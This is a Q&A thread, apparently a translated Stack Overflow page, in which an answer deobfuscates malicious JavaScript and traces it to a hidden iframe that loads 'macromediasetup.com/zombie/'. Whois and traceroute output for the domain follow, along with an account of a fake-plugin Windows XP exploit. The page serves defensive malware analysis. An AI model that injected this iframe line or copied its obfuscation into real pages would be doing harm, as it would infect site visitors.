答案 0 :(得分:42)
好的,所以这就是我想出来的......
基本上这个脚本执行
document.body.append('<iframe height="1" src="http://macromediasetup.com/zombie/">');
关键是:
oU[11][oU[9]][oU[10]](xZ);
oU是由以下行填充的数组:
oU[w](oL, s, q, jK, o, h, x, rE, jF, hZ, r, f, y);
oU [w]是对Array.push的引用。所以,调用它会将这13个项目推送到数组中。 f,hZ和r - > oU [11],oU [9]和oU [10]分别是:
var f = document;
var hZ = 'b]o]dBy5'.xAW(/[5];BD]/g, ''); // evaluates to "body"
var r = 'aNp6p)e6n#dNC0h6iNl0dN'.xAW(/[N)0#6]/g, ''); // evaluates to "append"
因此,这会变为document['body']['append']
或document.body.append()
xZ是iframe字符串,因此它将iframe添加到页面中。虽然直接点击macromediasetup.com只是重定向到adobe.com,但击中僵尸路线会有一些完全不同的事情......
此域名的whois显示它不属于adobe所有:
$ whois macromediasetup.com
[Querying whois.verisign-grs.com]
[Redirected to whois.PublicDomainRegistry.com]
[Querying whois.PublicDomainRegistry.com]
[whois.PublicDomainRegistry.com]
Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.
Contact: +7.4955801111
Domain Name: MACROMEDIASETUP.COM
Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Creation Date: 28-May-2010
Expiration Date: 28-May-2011
Domain servers in listed order:
ns2.reg.ru
ns1.reg.ru
Administrative Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Technical Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Billing Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Traceroute表明它正在拉脱维亚的某个地方......
7 nyk-bb1-link.telia.net (80.91.252.162) 77.169 ms 77.401 ms 77.327 ms
8 kbn-bb1-link.telia.net (80.91.254.88) 156.938 ms 156.960 ms 156.842 ms
9 s-bb1-link.telia.net (80.91.247.160) 166.491 ms 166.425 ms 166.499 ms
10 s-b3-link.telia.net (80.91.247.105) 212.715 ms 212.759 ms 212.776 ms
11 telia-latvija-ic-132810-s-b3.c.telia.net (213.248.82.134) 203.272 ms 203.313 ms 203.936 ms
编辑好吧所以我做了一点挖掘,只是因为它很有趣而且我弄清楚到底发生了什么。 iframe中包含的文件将检索一个文件,该文件将对Windows XP计算机使用“hcp”协议黑客攻击。基本上,包含的文件将在您的浏览器中显示“您需要安装一些您没有的漂亮插件”消息...然后,当您安装它时,您就在大便中。
答案 1 :(得分:7)
答案 2 :(得分:4)